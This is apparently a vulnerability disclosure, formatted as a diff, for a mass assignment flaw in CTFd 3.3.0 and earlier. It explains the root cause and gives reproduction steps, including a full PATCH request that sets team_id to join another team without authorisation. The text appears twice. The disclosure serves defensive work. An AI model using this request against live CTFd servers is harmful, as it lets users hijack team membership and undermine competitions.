pich4ya · November 25, 2022 16:05
diff --git a/ctfd_330_exploit.txt b/ctfd_330_exploit.txt
 @author Pichaya Morimoto ([email protected])

 Vulnerability: Broken Access Control/Mass Assignment Vulnerability in CTFd <= 3.3.0 
 CVE: n/a

 Impact:
 - Join CTF teams without knowing the team password or having a team invite
 - Can switch to another team, and switch back to the old team

 Attack Scenario:
 An attacker can join other teams to:
 - View hint without losing point (if set)
 - Make incorrect submission attempts until reaching the max attempt (if set)

 Root Cause Analysis:

 It is a classic Broken Access Control/Mass Assignment Vulnerability, where an attacker can set team_id in the user input field.
 The CTFd tries to overwrite certain fields (id, oauth_id, and created), but not the team_id !

 https://github.com/CTFd/CTFd/blob/8de9819bd45be7483f252d37d0d0a2977dd7bd6d/CTFd/schemas/users.py#L19

 class UserSchema(ma.ModelSchema):
    class Meta:
        model = Users
        include_fk = True
        dump_only = ("id", "oauth_id", "created")



 Steps to reproduce:

 1. Log in as a valid user in CTFd
 2. Call https://ctfd/api/v1/teams to view target's team ID
 3. Add/Change Team ID

 PATCH /api/v1/users/me HTTP/2
 Host: [DEDUCTED]
 Cookie: session=[DEDUCTED]
 Content-Length: 84
 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
 Accept: application/json
 Content-Type: application/json
 Csrf-Token: [DEDUCTED]
 Sec-Ch-Ua-Mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
 Sec-Ch-Ua-Platform: "macOS"
 Origin: https://[DEDUCTED]
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: https://[DEDUCTED]/settings
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9

 {"name":"sthpentest","email":"[email protected]","country":"TH", "team_id":1337,"fields":[]}
	@author Pichaya Morimoto ([email protected])

	Vulnerability: Broken Access Control/Mass Assignment Vulnerability in CTFd <= 3.3.0
	CVE: n/a

	Impact:
	- Join CTF teams without knowing the team password or having a team invite
	- Can switch to another team, and switch back to the old team

	Attack Scenario:
	An attacker can join other teams to:
	- View hint without losing point (if set)
	- Make incorrect submission attempts until reaching the max attempt (if set)

	Root Cause Analysis:

	It is a classic Broken Access Control/Mass Assignment Vulnerability, where an attacker can set team_id in the user input field.
	The CTFd tries to overwrite certain fields (id, oauth_id, and created), but not the team_id !

	https://github.com/CTFd/CTFd/blob/8de9819bd45be7483f252d37d0d0a2977dd7bd6d/CTFd/schemas/users.py#L19

	class UserSchema(ma.ModelSchema):
	class Meta:
	model = Users
	include_fk = True
	dump_only = ("id", "oauth_id", "created")



	Steps to reproduce:

	1. Log in as a valid user in CTFd
	2. Call https://ctfd/api/v1/teams to view target's team ID
	3. Add/Change Team ID

	PATCH /api/v1/users/me HTTP/2
	Host: [DEDUCTED]
	Cookie: session=[DEDUCTED]
	Content-Length: 84
	Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
	Accept: application/json
	Content-Type: application/json
	Csrf-Token: [DEDUCTED]
	Sec-Ch-Ua-Mobile: ?0
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
	Sec-Ch-Ua-Platform: "macOS"
	Origin: https://[DEDUCTED]
	Sec-Fetch-Site: same-origin
	Sec-Fetch-Mode: cors
	Sec-Fetch-Dest: empty
	Referer: https://[DEDUCTED]/settings
	Accept-Encoding: gzip, deflate
	Accept-Language: en-US,en;q=0.9

	{"name":"sthpentest","email":"[email protected]","country":"TH", "team_id":1337,"fields":[]}